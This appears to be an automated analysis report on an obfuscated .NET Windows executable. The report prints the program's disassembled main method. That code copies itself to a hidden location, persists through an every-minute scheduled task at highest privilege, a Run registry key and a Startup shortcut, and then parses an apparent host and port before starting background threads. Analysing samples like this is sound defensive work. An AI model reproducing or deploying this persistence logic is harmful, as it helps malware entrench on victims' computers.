Suspicious
Suspect

0c51e804d39cf461ce04bbccfc31c0d4

PE Executable | MD5: 0c51e804d39cf461ce04bbccfc31c0d4 | Size: 210.43 KB | application/x-dosexec


Characteristics

Symbol Obfuscation Score: Very high

File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
ID:000B
ID:0
ID:000C
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Module Name: DFIejfwfhnjvc.exe
Full Name: DFIejfwfhnjvc.exe
EntryPoint: System.Void Stub.bFbrunUZOUKCRnq::f0XW5uFo0ellEpW()
Scope Name: DFIejfwfhnjvc.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: DFIejfwfhnjvc
Assembly Version: 1.39.3323.1171
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 370
Main Method: System.Void Stub.bFbrunUZOUKCRnq::f0XW5uFo0ellEpW()
Main IL Instruction Count: 352

Main IL

ldsfld System.Int32 6dc3e3j0JlzSncd::ToqXtmESAAD7kr5 ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String 6dc3e3j0JlzSncd::06e50rvH3jiAdf1 call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::06e50rvH3jiAdf1 ldsfld System.String 6dc3e3j0JlzSncd::7tb0uyrREClAKKr call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::7tb0uyrREClAKKr ldsfld System.String 6dc3e3j0JlzSncd::voLDlfCLmxCwVxQ call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::voLDlfCLmxCwVxQ ldsfld System.String 6dc3e3j0JlzSncd::gCjBmTybhmKy2qr call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::gCjBmTybhmKy2qr ldsfld System.String 6dc3e3j0JlzSncd::pq46ClMDLhUwGmL call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::pq46ClMDLhUwGmL ldsfld System.String 6dc3e3j0JlzSncd::RhLndJKGgcxsSil call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String 6dc3e3j0JlzSncd::RhLndJKGgcxsSil ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.Object 
Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 ldsfld System.String 6dc3e3j0JlzSncd::uzCfE14enlYAlmb call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::uzCfE14enlYAlmb ldsfld System.String 6dc3e3j0JlzSncd::P8sY7SvDAt6pg7p call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::P8sY7SvDAt6pg7p leave.s IL_00E0: call System.Boolean Stub.c3p7H33ISTPlp5PEh2::WqNM7jczVQM3QHTbEL() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00E0: call System.Boolean Stub.c3p7H33ISTPlp5PEh2::WqNM7jczVQM3QHTbEL() call System.Boolean Stub.c3p7H33ISTPlp5PEh2::WqNM7jczVQM3QHTbEL() brtrue.s IL_00ED: call System.Void Stub.bFbrunUZOUKCRnq::B3iTkcLd8ThVWVJaqMlvaxXTLyoR4zFHpzYj5etyhQspBo8IDKzXMNRozdcf67wsWot3uS6tzmgWwsIos8UwWdxuSl() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.bFbrunUZOUKCRnq::B3iTkcLd8ThVWVJaqMlvaxXTLyoR4zFHpzYj5etyhQspBo8IDKzXMNRozdcf67wsWot3uS6tzmgWwsIos8UwWdxuSl() leave.s IL_0103: call System.Void Stub.bFbrunUZOUKCRnq::xj41ZwKUwBgF2j1xAWKaK34SxDGRpu0uX4wNGKhsBQOUPCBNO6wYCPJUOIbMG5omXqivklV6VGQXQH3SeIEKPgdKjr() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_5 call System.Void 
Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0103: call System.Void Stub.bFbrunUZOUKCRnq::xj41ZwKUwBgF2j1xAWKaK34SxDGRpu0uX4wNGKhsBQOUPCBNO6wYCPJUOIbMG5omXqivklV6VGQXQH3SeIEKPgdKjr() call System.Void Stub.bFbrunUZOUKCRnq::xj41ZwKUwBgF2j1xAWKaK34SxDGRpu0uX4wNGKhsBQOUPCBNO6wYCPJUOIbMG5omXqivklV6VGQXQH3SeIEKPgdKjr() ldsfld System.String 6dc3e3j0JlzSncd::RhLndJKGgcxsSil ldstr \ ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_6 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_014A: ldloc.1 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0161: ldc.i4 1000 ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.1 <null> ldsfld System.String Stub.c3p7H33ISTPlp5PEh2::wiNytaD3EFobPWtJIl call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_018C: ldstr "schtasks.exe" dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_018C: 
ldstr "schtasks.exe" ldstr schtasks.exe newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_10 ldloc.s V_10 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.String Stub.qgBupFH6dv3w557RIhTFwEjCgudOywBiKYBG9tX8vIJXKr5FrIqibJlw6fZzeZpTc2XrRd9jSehMMd1uysuUlqDKEL::eW47GiwSVvekbMAMzTU35TOH0Jkb1Z7XEkvslm243O675F2rE07rBzYkhszAXPZR9QaISMdYv2fd4Qg8klYyjVWkFX() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_01F2: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /RL HIGHEST /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) br.s IL_0236: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_10 call 
System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_9 ldloc.s V_9 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave.s IL_0257: call My.2RLSdZBObhDOC76 My.3u9kjmGqItL31aJ::uiINPjI4DdrG6lS() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0257: call My.2RLSdZBObhDOC76 My.3u9kjmGqItL31aJ::uiINPjI4DdrG6lS() call My.2RLSdZBObhDOC76 My.3u9kjmGqItL31aJ::uiINPjI4DdrG6lS() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.1 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_0292: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0292: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldstr WScript.Shell ldstr call System.Object 
Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldloc.s V_13 stelem.ref <null> ldloc.s V_16 stloc.s V_17 ldloc.s V_17 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_18 ldloc.s V_18 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_18 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_18 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0317: stloc.s V_19 ldloc.s V_17 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_13 stloc.s V_19 ldloc.s V_19 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr Save ldc.i4.0 <null> 
newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_19 ldloc.s V_13 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.c3p7H33ISTPlp5PEh2::ikjXfwqoeeJeED98w0 leave.s IL_0396: ldsfld System.String 6dc3e3j0JlzSncd::pq46ClMDLhUwGmL dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0396: ldsfld System.String 6dc3e3j0JlzSncd::pq46ClMDLhUwGmL ldsfld System.String 6dc3e3j0JlzSncd::pq46ClMDLhUwGmL call System.String Stub.bFbrunUZOUKCRnq::rSU0y1izFXFlyYU(System.String) stloc.0 <null> ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stsfld System.String 6dc3e3j0JlzSncd::jqgF1ytFzyIw9PW ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.1 <null> ldelem.ref <null> stsfld System.String 6dc3e3j0JlzSncd::alwXBvRZndBHonV call System.Void Stub.c3p7H33ISTPlp5PEh2::g2pZKM2xm2pn7Q94ud() ldnull <null> ldftn System.Void Stub.bFbrunUZOUKCRnq::wbHLMFaU80IM0uweMjnPThjdmvx9uLWCpW3Dupp0WrvhTRcDctKP6jYggTwmZS0TI7cRivGITfJtJvRyZsuWX345XS() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call 
System.String Stub.qgBupFH6dv3w557RIhTFwEjCgudOywBiKYBG9tX8vIJXKr5FrIqibJlw6fZzeZpTc2XrRd9jSehMMd1uysuUlqDKEL::eW47GiwSVvekbMAMzTU35TOH0Jkb1Z7XEkvslm243O675F2rE07rBzYkhszAXPZR9QaISMdYv2fd4Qg8klYyjVWkFX() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0407: call System.Void Stub.bFbrunUZOUKCRnq::kJ7g0KzDYXLFYGPzifSozT2QHIbuMeQNnsvhJgV0VkItsQdvCcZnNTYMxBe778cbVrEBWhIDVOo7zQTa9CUvMcTmLP() call System.Void Stub.36fd3U8dG0sI1QUwcZ::DdGkq3IuviCjXwF5tp() call System.Void Stub.bFbrunUZOUKCRnq::kJ7g0KzDYXLFYGPzifSozT2QHIbuMeQNnsvhJgV0VkItsQdvCcZnNTYMxBe778cbVrEBWhIDVOo7zQTa9CUvMcTmLP() ldnull <null> ldftn System.Void Stub.bFbrunUZOUKCRnq::T5Xtkv7GcO1MYmxZIWB5aDZ2KOWux9cvukulf2pkhzCOKdDz4q6LzeHbzOKEDb8hNJyjJjzDsM8uviHuMybqYReICX() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldnull <null> ldftn System.Void Stub.bFbrunUZOUKCRnq::aX5zV6jOW4wqCnAR4ysdVO6k2mz8W9N7VxFVF3IXx5j7ma6YAhNKDYgubsmanzBONSCDgkLfTTwaGefdjZzfg8kAaj() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.3 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
